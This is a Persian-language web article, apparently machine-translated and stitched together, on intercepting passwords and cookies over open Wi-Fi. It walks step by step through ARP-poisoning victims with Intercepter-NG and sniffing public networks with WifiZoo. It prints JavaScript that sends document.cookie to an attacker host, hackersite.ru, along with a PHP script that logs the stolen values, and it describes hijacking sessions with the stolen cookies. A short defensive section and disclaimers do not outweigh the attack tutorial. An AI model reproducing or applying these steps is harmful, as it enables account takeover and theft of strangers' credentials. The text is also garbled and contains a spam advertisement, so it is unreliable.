درباره خطرات نقاط دسترسی Wifi باز، در مورد نحوه رهگیری رمزهای عبور.

امروز ما به رهگیری رمزهای عبور از طریق Wi-Fi و رهگیری کوکی ها از طریق Wi-Fi با استفاده از این برنامه خواهیم پرداخت.

حمله به دلیل بو کشیدن.

بو کشیدن- sniff به عنوان "Sniff" ترجمه می شود. Sniffing به شما امکان می دهد فعالیت شبکه را در اینترنت تجزیه و تحلیل کنید، ببینید کاربر از کدام سایت ها بازدید می کند و رمزهای عبور را رهگیری می کند. اما می توان از آن برای اهداف مفید نیز استفاده کرد، برای گوش دادن به ویروس هایی که هر داده ای را به اینترنت می فرستند.

روشی که نشان خواهم داد کاملا ابتدایی و ساده است. در واقع می توانید از برنامه قوی تری استفاده کنید.
وب سایت رسمی برنامه sniff.su (لینک را کپی کنید و در یک تب جدید باز کنید) می توانید آن را در قسمت دانلود کنید. "دانلود".
یک نسخه برای ویندوز وجود دارد سیستم های یونیکسو برای اندروید
ما برای ویندوز در نظر خواهیم گرفت زیرا این بیشترین است سیستم محبوبو در اینجا برنامه پیشرفته ترین است.
مرورگر یا آنتی ویروس شما ممکن است از خطرناک بودن برنامه شکایت کند، اما خود شما می دانید که این یک برنامه هک است و همیشه به چنین هک هایی پاسخ می دهد.
برنامه دانلود می شود بایگانی فشرده، فقط باید برنامه را در یک پوشه باز کنید و از آن استفاده کنید، نیازی به نصب چیزی نیست.
این برنامه قابلیت تنظیم های مختلف را دارد حملات میتمدر شبکه وای فای
مقاله صرفاً برای مقاصد اطلاعاتی نوشته شده است تا به عنوان مثال خطرات باز بودن را نشان دهد نقاط وای فایهر اقدامات مشخص شده، شما با خطر و خطر خود عمل می کنید. و من می خواهم مسئولیت کیفری برای محافظت از داده های دیگران را به شما یادآوری کنم.

سرویس avi1قیمت های نفس گیر ارزانی را برای فرصت سفارش مشترکین به پروفایل اینستاگرام خود ارائه می دهد. همین الان، بدون صرف تلاش و زمان زیاد، به محبوبیت یا فروش آنلاین بیشتری دست پیدا کنید.

کار با برنامه Intercepter NG

بنابراین، برنامه از طریق Intercepter-NG.exe راه اندازی می شود.
این برنامه دارای یک رابط انگلیسی است، اما اگر شما یک کاربر کامپیوتر مطمئن هستید، فکر می کنم آن را متوجه خواهید شد.

در زیر ویدیویی در مورد راه اندازی (برای کسانی که ترجیح می دهند به جای خواندن تماشا کنند) وجود دارد.
- انتخاب کنید شبکه مورد نظردر بالا اگر چندین مورد از آنها را دارید.
- نوع را تغییر دهید اترنت/وای فای، اگر Wi Fi دارید، باید نماد Wi FI (در سمت چپ انتخاب شبکه) را انتخاب کنید.

- دکمه را فشار دهید حالت اسکن(نماد رادار)
- در یک قسمت خالی کلیک راست کرده و روی آن کلیک کنید منوی زمینه اسکن هوشمند
- همه دستگاه های متصل به شبکه ظاهر می شوند
- قربانی را انتخاب کنید (با نگه داشتن کلید Shift می توانید همه را انتخاب کنید)، فقط خود روتر را علامت گذاری نکنید، IP آن معمولاً 192.168.1.1 است.
- پس از انتخاب، کلیک راست کرده و کلیک کنید به nat اضافه کنید

- به برگه بروید نات
- که در آی پی مخفیتوصیه می شود آخرین رقم را به هر رقم خالی تغییر دهید، این باعث می شود IP واقعی شما پنهان شود.
- تیک بزن نوار SSLو SSL Mitm.

- کلیک تنظیمات(دنده سمت راست).
- تیک بزن رستاخیز(این به شما امکان می دهد رمزهای عبور و کوکی های پروتکل Https رمزگذاری شده را رهگیری کنید) و حذف کنید جعل IP/Mac. می توانید کادر را علامت بزنید قاتل کوکیبرای مثال، به لطف او، قربانی از صفحه فعلی اخراج می شود شبکه اجتماعیو قربانی باید رمز عبور را دوباره وارد کند و ما آن را رهگیری خواهیم کرد. تنظیمات را با تصویر مقایسه کنید.

- در اینجا تنظیمات کامل شده است، تنظیمات را با یک علامت ببندید.
- تنظیمات کامل شده است، می توانید حمله را شروع کنید.
- دکمه را در بالا فشار دهید شروع/ توقف بوییدن(مثلث)، در همان پنجره روی نماد تابش در پایین کلیک کنید Start/Stop ARP Poison
- به برگه بروید حالت رمز عبورو در پنجره کلیک راست کرده و انتخاب کنید نمایش کوکی ها("این اجازه می دهد تا کوکی ها و رمزهای عبور وارد شده توسط قربانیان نشان داده شوند")
تمام شد، منتظریم کسی رمز را وارد کند.
گاهی اوقات اتفاق می افتد که اینترنت از کار می افتد، سعی کنید خودتان به اینترنت دسترسی داشته باشید، اگر کار نکرد، برنامه را مجددا راه اندازی کنید.
من متوجه شدم که همیشه نمی توان رمز عبور را رهگیری کرد، اما در واقع تقریباً بدون شکست کار می کند.

این همه چیز است، ما رهگیری رمزهای عبور از طریق Wi-Fi و رهگیری کوکی ها از طریق Wi-Fi را بررسی کردیم.

مراقب خودت باش

بیسکویت ها - اطلاعات در قالب یک فایل متنی که توسط وب سایت در رایانه کاربر ذخیره شده است. حاوی داده های احراز هویت (ورودی / رمز عبور، شناسه، شماره تلفن، آدرس). صندوق پستی)، تنظیمات کاربر، وضعیت دسترسی. در نمایه مرورگر ذخیره می شود.

هک کوکی دزدی (یا "ربایش") جلسه بازدیدکنندگان منبع وب است. اطلاعات خصوصی نه تنها برای فرستنده و گیرنده، بلکه برای شخص ثالث - شخصی که رهگیری را انجام داده است، در دسترس قرار می گیرد.

ابزارها و تکنیک های هک کوکی ها

سارقان رایانه، مانند همکاران خود در زندگی واقعی، علاوه بر مهارت، مهارت و دانش، البته، ابزارهای خاص خود را نیز دارند - نوعی زرادخانه از کلیدها و پروب های اصلی. بیایید نگاهی به محبوب ترین ترفندهایی که هکرها برای استخراج کوکی ها از کاربران اینترنت استفاده می کنند بیندازیم.

اسنیفرها

برنامه های ویژهبرای ردیابی و تجزیه و تحلیل ترافیک شبکه. نام آنها از فعل انگلیسی "sniff" (sniff) گرفته شده است، زیرا. بسته های ارسالی بین گره ها به معنای واقعی کلمه "بوی کردن" است.

اما مهاجمان از یک sniffer برای رهگیری داده‌های جلسه، پیام‌ها و موارد دیگر استفاده می‌کنند اطلاعات محرمانه. اهداف حملات آنها عمدتاً شبکه های محافظت نشده هستند، جایی که کوکی ها در یک جلسه HTTP باز ارسال می شوند، یعنی عملاً رمزگذاری نمی شوند. (وای فای عمومی در این زمینه آسیب پذیرترین است.)

برای جاسازی یک sniffer در کانال اینترنت بین گره کاربر و وب سرور، از روش های زیر استفاده می شود:

• "گوش دادن" به رابط های شبکه (هاب ها، سوئیچ ها)؛
• انشعاب و کپی ترافیک؛
• اتصال به شکاف کانال شبکه؛
• تجزیه و تحلیل از طریق حملات ویژه ای که ترافیک قربانی را به sniffer هدایت می کند (MAC-spoofing، IP-spoofing).

مخفف XSS مخفف آن است کراس سایتاسکریپت - اسکریپت نویسی بین سایتی. برای حمله به وب سایت ها به منظور سرقت اطلاعات کاربران استفاده می شود.

اصل XSS به شرح زیر است:

• یک مهاجم کد مخرب (یک اسکریپت پنهان خاص) را در صفحه وب یک وب سایت، انجمن یا در یک پیام (مثلاً هنگام مکاتبه در یک شبکه اجتماعی) وارد می کند.
• قربانی به صفحه آلوده می رود و کد نصب شده را روی رایانه شخصی خود فعال می کند (کلیک می کند، پیوند را دنبال می کند و غیره).
• به نوبه خود، کد مخرب اجرا شده داده های محرمانه کاربر را از مرورگر (به ویژه کوکی ها) "استخراج" می کند و آن را به وب سرور مهاجم ارسال می کند.

هکرها برای «کاشتن» مکانیزم نرم‌افزاری XSS از انواع آسیب‌پذیری‌ها در سرورهای وب، سرویس‌های آنلاین و مرورگرها استفاده می‌کنند.

تمام آسیب پذیری های XSS به دو نوع تقسیم می شوند:

• منفعل. حمله با درخواست یک اسکریپت خاص در یک صفحه وب به دست می آید. کد مخربرا می توان به اشکال مختلف در یک صفحه وب (مثلاً در نوار جستجوی سایت) وارد کرد. مستعدترین نسبت به XSS غیرفعال منابعی هستند که تگ های HTML را هنگام رسیدن داده ها فیلتر نمی کنند.
• فعال. مستقیماً روی سرور قرار دارد. و در مرورگر قربانی فعال می شوند. آنها به طور فعال توسط کلاهبرداران در انواع وبلاگ ها، چت ها و فیدهای خبری استفاده می شوند.

هکرها با دقت اسکریپت های XSS خود را "استتار" می کنند تا قربانی به چیزی مشکوک نشود. آنها پسوند فایل را تغییر می دهند، کد را به عنوان تصویر ارسال می کنند، آنها را تشویق می کنند که پیوند را دنبال کنند و با محتوای جالب آنها را جذب می کنند. در نتیجه: یک کاربر رایانه شخصی که قادر به کنترل کنجکاوی خود نیست، با دست خود (با یک کلیک ماوس) کوکی های جلسه (با ورود به سیستم و رمز عبور!) را برای نویسنده اسکریپت XSS - شرور رایانه ارسال می کند.

جایگزینی کوکی

همه کوکی‌ها بدون هیچ تغییری - به شکل اصلی - با همان مقادیر، رشته‌ها و سایر داده‌ها، ذخیره می‌شوند و به سرور وب (که از آنجا آمده‌اند) ارسال می‌شوند. تغییر عمدی پارامترهای آنها را جایگزینی کوکی می گویند. به عبارت دیگر، هنگام جایگزینی کوکی‌ها، مهاجم وانمود می‌کند که یک تفکر آرزویی است. به عنوان مثال، هنگام پرداخت در یک فروشگاه آنلاین، کوکی مقدار پرداخت را به سمت پایین تغییر می دهد - بنابراین، "صرفه جویی" در خرید اتفاق می افتد.

کوکی‌های جلسه دزدیده شده در یک شبکه اجتماعی از حساب شخص دیگری در جلسه دیگری و در رایانه شخصی دیگر «درج» می‌شوند. مالک کوکی های دزدیده شده تا زمانی که قربانی در صفحه خود باشد، به حساب قربانی (مکاتبات، محتوا، تنظیمات صفحه) دسترسی کامل دارد.

"ویرایش" کوکی ها با استفاده از موارد زیر انجام می شود:

• عملکرد "مدیریت کوکی ها..." در مرورگر اپرا;
• افزونه‌های مدیریت کوکی‌ها و مدیریت کوکی پیشرفته برای فایرفاکس.
• ابزارهای IECookiesView (فقط برای اینترنت اکسپلورر);
• ویرایشگر متنمانند AkelPad، NotePad یا Notepad ویندوز.

دسترسی فیزیکی به داده ها

خیلی مدار سادهپیاده سازی شامل چندین مرحله است. اما تنها در صورتی مؤثر است که رایانه قربانی با یک جلسه باز، به عنوان مثال VKontakte، بدون مراقبت رها شود (و برای مدت طولانی!):

1. که در نوار آدرسمرورگر وارد شده است تابع جاوا اسکریپت، تمام کوکی های ذخیره شده را نمایش می دهد.
2. پس از فشار دادن "ENTER" همه آنها در صفحه ظاهر می شوند.
3. کوکی ها کپی می شوند، در یک فایل ذخیره می شوند و سپس به یک درایو فلش منتقل می شوند.
4. در رایانه دیگری، کوکی ها در یک جلسه جدید جایگزین می شوند.
5. دسترسی به حساب قربانی داده شده است.

به عنوان یک قاعده، هکرها از ابزارهای بالا (+ ابزارهای دیگر) هم به صورت ترکیبی (از آنجایی که سطح حفاظت در بسیاری از منابع وب بسیار بالا است) و هم به طور جداگانه (زمانی که کاربران بیش از حد ساده لوح هستند) استفاده می کنند.

XSS + sniffer

1. یک اسکریپت XSS ایجاد می‌شود که آدرس یک sniffer آنلاین (خواه خانگی یا یک سرویس خاص) را مشخص می‌کند.
2. کد مخرب با پسوند .img (فرمت تصویر) ذخیره می شود.
3. این فایل سپس در یک صفحه وب سایت، چت یا پیام شخصی آپلود می شود - جایی که حمله انجام خواهد شد.
4. توجه کاربر به "تله" ایجاد شده جلب می شود (این جایی است که مهندسی اجتماعی به اجرا در می آید).
5. اگر تله فعال شود، کوکی‌های مرورگر قربانی توسط sniffer رهگیری می‌شوند.
6. مهاجم لاگ های اسنیفر را باز می کند و کوکی های دزدیده شده را بازیابی می کند.
7. در مرحله بعد، برای به دست آوردن حقوق صاحب حساب با استفاده از ابزارهای بالا، جایگزینی را انجام می دهد.

محافظت از کوکی ها در برابر هک شدن

1. از یک اتصال رمزگذاری شده (با استفاده از پروتکل ها و روش های امنیتی مناسب) استفاده کنید.
2. به پیوندها، تصاویر یا پیشنهادات وسوسه انگیز برای آشنایی با "نرم افزار رایگان جدید" پاسخ ندهید. مخصوصاً از غریبه ها.
3. فقط از منابع وب قابل اعتماد استفاده کنید.
4. جلسه مجاز را با کلیک بر روی دکمه "خروج" (نه فقط بستن برگه!) پایان دهید. به خصوص اگر نه از یک رایانه شخصی، بلکه مثلاً از رایانه شخصی در یک کافی نت وارد حساب خود شده باشید.
5. از ویژگی «ذخیره رمز عبور» مرورگر استفاده نکنید. داده های ثبت شده ذخیره شده خطر سرقت را به میزان قابل توجهی افزایش می دهد. تنبل نباشید، در ابتدای هر جلسه چند دقیقه وقت خود را با وارد کردن رمز عبور و لاگین خود تلف نکنید.
6. پس از گشت و گذار در وب - بازدید از شبکه های اجتماعی، انجمن ها، چت ها، وب سایت ها - کوکی های ذخیره شده را حذف کنید و کش مرورگر را پاک کنید.
7. مرورگرها و نرم افزارهای آنتی ویروس را به طور مرتب به روز کنید.
8. از افزونه های مرورگر استفاده کنید که در برابر حملات XSS محافظت می کنند (به عنوان مثال، NoScript برای FF و Google Chrome).
9. به صورت دوره ای در حساب ها.

و مهمتر از همه، هنگام استراحت یا کار در اینترنت، هوشیاری و توجه خود را از دست ندهید!

کوکی چیست؟

مکانیزمی وجود دارد که به سرور http اجازه می دهد مقداری را ذخیره کند اطلاعات متنیو سپس با او تماس بگیرید. این اطلاعاتبه نام کوکی در اصل، هر کوکی یک جفت است: نام یک پارامتر و مقدار آن. به هر کوکی دامنه ای که به آن تعلق دارد نیز اختصاص داده می شود. به دلایل امنیتی، در تمام مرورگرها سرور http فقط اجازه دسترسی به کوکی دامنه خود را دارد. علاوه بر این، کوکی‌ها ممکن است تاریخ انقضا داشته باشند، در این صورت حتی اگر تمام پنجره‌های مرورگر را ببندید، تا این تاریخ در رایانه ذخیره می‌شوند.

همه سیستم های چند کاربره از کوکی ها برای شناسایی کاربر استفاده می کنند. و یا به جای، اتصال فعلیکاربر با سرویس، جلسه کاربر. اگر شخصی کوکی های شما را بشناسد، می تواند از طرف شما وارد سیستم شود. زیرا در در حال حاضرتعداد بسیار کمی از منابع اینترنتی تغییرات آدرس IP را در طول یک جلسه کاربر بررسی می کنند.

توسعه دهندگان مرورگر ابزارهای داخلی را برای ویرایش کوکی ها ارائه نمی کنند. اما می توانید با یک دفترچه یادداشت معمولی از پس آن بربیایید.

ویرایشگر رجیستری ویندوز نسخه 5.00



@="C:\\IE_ext.htm"

آن را با نام IE_ext.reg ذخیره کنید

مرحله 2: با استفاده از فایل ایجاد شده، تغییرات را به رجیستری ویندوز اضافه کنید.

مرحله 3: یک فایل متنی با متن ایجاد کنید

< script language="javascript">
external.menuArguments.clipboardData.setData("متن"، external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "testname=testvalue; path=/; domain=testdomain.ru";
هشدار (external.menuArguments.document.cookie);

مرحله 4: به وب سایت مورد علاقه خود می رویم.

مرحله 5: روی فضای خالی صفحه کلیک راست کرده و آیتم منو را انتخاب کنید "کار با کوکی ها". اجازه دسترسی به کلیپ بورد. کوکی های شما از این سایت به کلیپ بورد می روند. می توانید دفترچه یادداشت آنها را وارد کنید و نگاهی بیندازید.

مرحله 6: برای تغییر برخی از کوکی ها، فایل C:\IE_ext.htm را ویرایش کنید و جایگزین کنید. نام آزمونبه نام کوکی، ارزش آزمایشی- در معنای آن، testdomain.ru– به دامنه سایت. در صورت لزوم، خطوط مشابه بیشتری اضافه کنید. برای سهولت کنترل، خروجی کوکی‌های فعلی را قبل و بعد از تغییر به اسکریپت اضافه کردم: هشدار (external.menuArguments.document.cookie);

مرحله 7: مرحله 5 را دوباره انجام دهید و سپس صفحه را بازخوانی کنید.

خط پایین: ما با کوکی های به روز شده به این منبع اینترنتی دسترسی خواهیم داشت.

چگونه با استفاده از جاوا اسکریپت کوکی ها را بدزدیم؟

اگر مهاجمی بتواند فرصتی برای اجرای یک اسکریپت جاوا اسکریپت دلخواه در رایانه قربانی پیدا کند، آنگاه می‌تواند کوکی‌های فعلی را به راحتی بخواند. مثال:

var str= document.cookie;

اما آیا او می تواند آنها را به سایت خود منتقل کند، زیرا همانطور که قبلاً اشاره کردم، یک اسکریپت جاوا اسکریپت نمی تواند بدون تأیید اضافی به سایتی که در دامنه دیگری قرار دارد دسترسی پیدا کند؟ به نظر می رسد که یک اسکریپت جاوا اسکریپت می تواند هر تصویری را که در هر سرور http قرار دارد بارگیری کند. در عین حال هرگونه اطلاعات متنی در درخواست دانلود را به این تصویر منتقل کنید. مثال: http://hackersite.ru/xss.jpg?text_infoبنابراین اگر این کد را اجرا کنید:

var img= عکس جدید()؛

img.src= "http://hackersite.ru/xss.jpg؟"+ encodeURI (document.cookie)؛

چگونه می توان با چنین درخواست هایی برای دانلود یک "تصویر" برخورد کرد؟

یک مهاجم فقط باید میزبانی با پشتیبانی PHP پیدا کند و کدهایی مانند این را در آنجا قرار دهد:

$uid=urldcode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt"،"a");
fputs($fp,"$uid\n");
fclose($fp);
?>

سپس تمام پارامترهای درخواست برای این اسکریپت در فایل ذخیره می شود log.txt. تنها چیزی که باقی می ماند جایگزینی اسکریپت جاوا اسکریپت توصیف شده قبلی است http://hackersite.ru/xss.jpgبه مسیر این اسکریپت php.

من فقط ساده ترین راه را برای سوء استفاده از آسیب پذیری های XSS نشان دادم. اما این ثابت می‌کند که وجود حداقل یکی از این آسیب‌پذیری‌ها در یک سایت اینترنتی چند کاربره می‌تواند به مهاجم اجازه دهد از منابع آن از طرف شما استفاده کند.

آیا متوجه شده اید که وقتی به سایتی که قبلاً بازدید کرده اید باز می گردید، سایت شما را می شناسد و با تنظیماتی که دفعه قبل اعمال کرده اید باز می شود؟ بله، و اغلب؟ این به لطف کوکی‌هایی اتفاق می‌افتد که اطلاعات مربوط به بازدیدکنندگان مانند ورود، رمز عبور، شناسه جلسه و سایر متغیرهای مورد نیاز برای شناسایی بازدیدکننده و نمایش محتوای صفحه را با توجه به اولویت‌های کاربر انتخاب شده در آخرین بازدید از منبع ذخیره می‌کنند. برنامه WebCookiesSniffer کوکی ها و محتویات آنها را در سایت هایی که کاربر در مرورگر مشاهده می کند به کاربر نشان می دهد.

مشاهده کوکی ها

شما یک وب سایت باز می کنید و WebCookiesSniffer عکس می گیرد بیسکویت ها s در زمان واقعی. این ابزار همه کوکی‌های گرفته شده را به جدولی اضافه می‌کند که داده‌های مربوط به میزبان، مسیر درخواست، طول کل فایل کوکی، تعداد متغیرهای موجود در فایل کوکی و خود کوکی را با نام متغیرها و مقادیر ذخیره می‌کند. WebCookiesSniffer می تواند اطلاعات جمع آوری شده در مورد کوکی ها را در یک فایل متنی ذخیره کند. این برنامه همچنین توانایی ایجاد یک گزارش HTML برای همه یا کوکی های انتخاب شده را دارد. برای اینکه برنامه کار کند، باید درایور WinPcap (که در بایگانی به همراه WebCookiesSniffer قرار دارد) را نصب کنید. برای تغییر زبان برنامه WebCookiesSniffer به روسی، فایل WebCookiesSniffer_lng.ini (همچنین در بایگانی موجود است) را در دایرکتوری همراه با ابزار کپی کنید.

تصاویری از برنامه WebCookiesSniffer

سلام، این مقاله کوتاه، نه حتی یکنواخت توضیح کوتاهدوست دارم خودم را وقف کنم راه سادهاستراق سمع بیسکویت ها V شبکه های وای فای. اگر شخصی علاقه مند به رهگیری "کالاهای پخته شده" باشد، در اینجا به شما نمی گویم کوکی ها چیست و چرا به آنها نیاز است. در یک شبکه بی سیم، من فکر می کنم او باید بداند که چیست و چرا به آن نیاز دارد. من فقط یک چیز را می گویم: با استفاده از این فایل ها می توانید به حساب های افراد دیگر در سایت های مختلف دسترسی پیدا کنید که کاربران را ملزم به انجام فرآیند احراز هویت می کند (به عنوان مثال، mail.ru، vkontakte.ru و غیره).

پس بیایید شروع کنیم. ابتدا باید آن را پیدا کنیم شبکه بی سیم، با یک دروازه دسترسی به اینترنت باز است و مطلوب است که این شبکه مشتریان بسیار زیادی داشته باشد. به عنوان مثال، هر شبکه ای در مراکز خرید بزرگ، فرودگاه ها، کافی شاپ های مختلف مناسب است؛ در چنین مکان هایی معمولا مردم استفاده می کنند. دسترسی به وای فایدر اینترنت، برای خواندن نامه، چک کردن حساب ها در سایت های دوستیابی مختلف، مشاهده LJ و انجمن های مختلف. این دقیقاً همان چیزی است که ما نیاز داریم. پس از تصمیم گیری در مورد انتخاب مکان شبکه، با مطالعه ساعات مشخصی از حداکثر تعداد مشتریان، اجازه دهید مستقیماً به عملیات رزمی برویم. برای انجام این کار، به یک لپ تاپ با آداپتور Wi-Fi و مجموعه خاصی از برنامه ها نیاز داریم. در مورد من استفاده کردم لپ تاپ ایسر Aspire 3610، کارت وای فای مشتری D-Link DWL G650 و سیستم عامل BackTrack3 نصب شده است.

من به شما توصیه می کنم از این سیستم عامل استفاده کنید، زیرا از قبل شامل کل مجموعه برنامه هایی است که ممکن است به آن نیاز داشته باشید، و مهمترین مزیت این است که شما مجبور نیستید Backtrack را بر روی خود نصب کنید. HDD، می توانید این سیستم عامل را مستقیماً از یک سی دی یا فلش درایو بوت کنید.

حال به سراغ نرم افزارهای لازم می رویم. من از kismet برای کشف شبکه و WifiZoo برای رهگیری کوکی ها استفاده کردم. من به طور مفصل در مورد برنامه دوم صحبت خواهم کرد. WifiZoo یک اسکنر امواج هوایی غیرفعال است و مقدار زیادی را جمع آوری می کند اطلاعات مفیدمانند: pop3، ترافیک smtp، http cookies/authinfo، msn، اعتبارنامه ftp، ترافیک شبکه telnet، nbt و غیره. تنها عیب این برنامه عدم وجود حالت پرش کانال است، WifiZoo فقط گوش می دهد رابط بی سیم، و به اصطلاح نمی تواند از کانالی به کانال دیگر بپرد. اما این عیب با برنامه دیگری به نام Kismet که از این حالت پشتیبانی می کند جبران می شود. برای راه اندازی WifiZoo شما نیاز دارید:

• پایتون
• پوسته پوسته شدن
• کیسمت

پس بیایید برنامه را راه اندازی کنیم، ابتدا Kismet را برای پشتیبانی از حالت پرش کانال راه اندازی می کنیم، سپس WifiZoo را مستقیماً راه اندازی می کنیم، پنجره زیر باید در مقابل شما ظاهر شود:

اکنون تنها چیزی که باقی می‌ماند این است که بنشینید و منتظر بمانید تا چیزی را رهگیری کنید؛ هر چیزی که برنامه رهگیری می‌کند را می‌توان در لاگ‌هایی که در دایرکتوری با برنامه /logs/ قرار دارند، پیدا کرد. همچنین می توانید یک رابط رابط کاربری گرافیکی راه اندازی کنید که به طور خودکار به http در 127.0.0.1:8000 متصل می شود.

من در مورد تمام ویژگی های این برنامه فوق العاده نمی نویسم، فکر می کنم بقیه احتمالات را خودتان متوجه خواهید شد و از آنجایی که این لحظهما فقط به کوکی ها علاقه مندیم. روی پیوندی که می گوید کوکی ها کلیک کنید و ببینید چه چیزی را رهگیری کردیم: